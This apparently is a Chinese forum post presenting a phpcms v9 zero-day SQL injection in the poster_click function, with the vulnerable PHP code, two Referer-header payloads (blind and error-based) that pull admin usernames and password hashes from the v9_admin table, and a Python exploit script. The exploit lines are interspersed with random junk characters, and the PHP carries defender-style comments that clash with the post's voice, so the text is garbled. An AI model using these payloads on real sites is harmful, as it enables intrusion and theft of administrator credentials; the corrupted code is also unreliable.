有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数\phpcms\modules\poster\index.php
/**
 * Click-tracking redirect for a poster (ad) record.
 *
 * Looks up the poster by the `id` query parameter, records the click in the
 * statistics table, increments the poster's click counter and then sends the
 * browser to the poster's link via a Location header.
 *
 * Security notes (defender's reading of this function):
 *  - `referer` is taken straight from the HTTP_REFERER constant, i.e. from the
 *    client-supplied Referer header. Nothing in this function escapes or
 *    validates it before it is handed to insert(); whether the db layer escapes
 *    it is not visible here, and the post's payloads target exactly this column.
 *    Treat it like any other request input: escape/validate at this point.
 *  - `username` comes from a cookie via param::get_cookie(); any sanitisation
 *    would have to happen inside that helper (not visible here).
 *  - In the `else` branch the raw `$_GET['url']` is used as the redirect target,
 *    which is an open redirect unless validated elsewhere. The safer pattern is
 *    to redirect only to the configured linkurl, or to check `$_GET['url']`
 *    against an allowlist.
 *
 * @return bool|void  false when no poster matches `id`; otherwise redirects.
 */
public function poster_click() {
    // intval() makes the id safe for the lookups below.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // Both halves of this condition are true for a missing row; the empty()
    // check alone would suffice.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // Cookie-derived value; not validated in this function.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // HTTP_REFERER (client-controlled Referer header) is stored unescaped
        // by this function -- this is the value the post's injection targets.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    // Counter update runs even when $id is 0 (the insert above is skipped).
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // Raw query-string URL used as the redirect target (open redirect risk).
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}
利用方式:
1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面正常与否,一个个猜解密码字段。
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法,原理自查。
利用程序:
* t8 q. f( j% N" ~#!/usr/bin/env python. _9 v6 T8 X- J: [+ H
import httplib,sys,re
3 [, E/ J( }& h2 T D, h1 i3 G* k, D% ]+ Y4 l/ t3 R$ }" K4 M+ s
def attack():; _4 b# h3 D1 r
print “Code by Pax.Mac Team conqu3r!”
2 r3 Y. m e7 `* Y7 l) j: Z1 ]print “Welcome to our zone!!!”
. P% d0 V# n. Z- o+ Vurl=sys.argv[1]
0 a- J7 X6 u* ?* h- Z$ [paths=sys.argv[2]
) T7 ]1 Q- S- `% Z, Mconn = httplib.HTTPConnection(url)1 N: I6 B S9 N* p
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
+ c( H/ i; P. a+ u- P$ w“Accept”: “text/plain”,
# t3 @6 ]9 \$ n7 n! C- N) s“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}. \# W- W1 z' J c3 ]( L
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): B- A6 \0 U0 V3 V5 L/ ?8 R+ b
r1 = conn.getresponse()& _/ b$ D3 D$ B: r2 ^
datas=r1.read(), G5 R! g; u7 ~, `- j" i
datas=re.findall(r”Duplicate entry \’\w+’”, datas)5 E% j. J3 @1 z; c. f
print datas[0]
4 ?( c6 J3 M! }# q8 T9 |conn.close()
3 R \$ Z6 |+ y. B3 yif __name__==”__main__”:3 C, H$ D* w+ Z* ^1 A \& A
if len(sys.argv)<3:
8 q" ]9 C; ?4 T- b E' ?print “Code by Pax.Mac Team conqu3r”
1 @# T5 B1 R2 J5 E+ kprint “Usgae:”
7 @8 I" {9 J" f3 Z# {- N; P( yprint “ phpcmsattack.py www.paxmac.org /”8 f }" K6 j+ f- p5 d- z, j7 Y
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
" G) A$ G: r$ W6 t$ G/ q: Fsys.exit(1)! z7 C( V0 q" z+ }6 G/ o) W
attack()" ?9 B. E2 P( S) I$ x